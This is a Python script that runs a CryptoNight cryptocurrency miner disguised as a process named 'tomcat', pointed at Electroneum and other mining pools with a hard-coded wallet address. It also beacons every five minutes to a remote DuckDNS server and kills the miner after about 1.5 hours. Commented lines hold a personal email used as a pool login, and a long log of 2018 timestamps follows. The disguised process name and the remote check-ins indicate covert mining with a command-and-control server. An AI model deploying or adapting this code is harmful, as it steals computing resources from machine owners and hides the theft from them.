import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:01.831021
#2018-02-17 16:52:07.371954
#2018-02-17 18:41:05.071224
#2018-02-17 20:29:06.009611
#2018-02-17 22:15:04.887418
#2018-02-17 23:59:01.576039
#2018-02-18 01:49:07.276169
#2018-02-18 03:39:01.538185
#2018-02-18 05:26:04.193230
#2018-02-18 07:18:05.498901
#2018-02-18 09:06:06.209098
#2018-02-18 10:52:07.144532
#2018-02-18 12:39:01.344852
#2018-02-18 14:26:05.443711
#2018-02-18 16:15:08.882984
#2018-02-18 18:06:01.303275
#2018-02-18 19:52:03.491472
#2018-02-18 21:38:07.097672
#2018-02-18 23:26:06.281599
#2018-02-19 01:13:01.376763
#2018-02-19 02:58:04.354394
#2018-02-19 04:45:06.699239
#2018-02-19 06:31:03.529431
#2018-02-19 08:20:07.063885
#2018-02-19 10:09:07.195795
#2018-02-19 11:58:04.073091
#2018-02-19 13:44:08.835812
#2018-02-19 15:34:05.572728
#2018-02-19 17:21:01.803973
#2018-02-19 19:08:01.912432
#2018-02-19 20:52:01.323566
#2018-02-19 22:39:07.564649
#2018-02-20 00:24:06.094797
#2018-02-20 02:13:07.783108
#2018-02-20 04:04:07.907491
#2018-02-20 05:48:06.665964
#2018-02-20 07:33:04.465253
#2018-02-20 09:17:06.185075
#2018-02-20 11:01:08.513368
#2018-02-20 12:48:01.406598
#2018-02-20 14:33:04.887780
#2018-02-20 16:17:05.960689
#2018-02-20 18:05:03.152171
#2018-02-20 19:57:01.529668
#2018-02-20 21:44:01.400340
#2018-02-20 23:25:01.541822
#2018-02-21 01:08:03.769570
#2018-02-21 02:54:06.151851
#2018-02-21 04:41:02.004732
#2018-02-21 06:28:06.792336
#2018-02-21 08:15:05.093661
#2018-02-21 10:02:09.241851
#2018-02-21 11:49:13.351709
#2018-02-21 13:40:01.376911
#2018-02-21 15:23:07.797161
#2018-02-21 17:14:09.713905
#2018-02-21 19:03:02.048135
#2018-02-21 20:51:04.409401
#2018-02-21 22:37:01.824073
#2018-02-22 00:26:04.716918
#2018-02-22 02:13:01.368128
#2018-02-22 03:58:06.645222
#2018-02-22 05:45:06.976916
#2018-02-22 07:29:08.101811
#2018-02-22 09:17:08.069361
#2018-02-22 11:05:02.833219
#2018-02-22 12:50:11.942795
#2018-02-22 14:36:07.943888
#2018-02-22 16:21:09.147507
#2018-02-22 18:08:05.369699
#2018-02-22 19:58:02.061197
#2018-02-22 21:47:05.471917
#2018-02-22 23:36:06.846321
#2018-02-23 01:25:07.588595
#2018-02-23 03:11:02.074969
#2018-02-23 04:58:07.388433
#2018-02-23 06:43:01.977042
#2018-02-23 08:33:06.222068
#2018-02-23 10:48:08.435983
#2018-02-23 12:44:02.130259
#2018-02-23 14:28:01.738264
#2018-02-23 16:18:11.301135
#2018-02-23 18:05:06.976089
#2018-02-23 19:51:07.258102
#2018-02-23 21:34:04.540713
#2018-02-23 23:21:06.535252
#2018-02-24 01:13:07.300429
#2018-02-24 03:05:07.057966
#2018-02-24 04:50:08.416392
#2018-02-24 06:35:08.949177
#2018-02-24 08:24:01.519348
#2018-02-24 10:11:01.555077
#2018-02-24 12:05:08.294661
#2018-02-24 13:53:07.103857
#2018-02-24 15:42:05.204039
#2018-02-24 17:35:07.454695
#2018-02-24 19:21:07.955590
#2018-02-24 21:12:04.245882
#2018-02-25 01:09:07.292492
#2018-02-25 04:32:06.410871
#2018-02-25 07:58:06.049423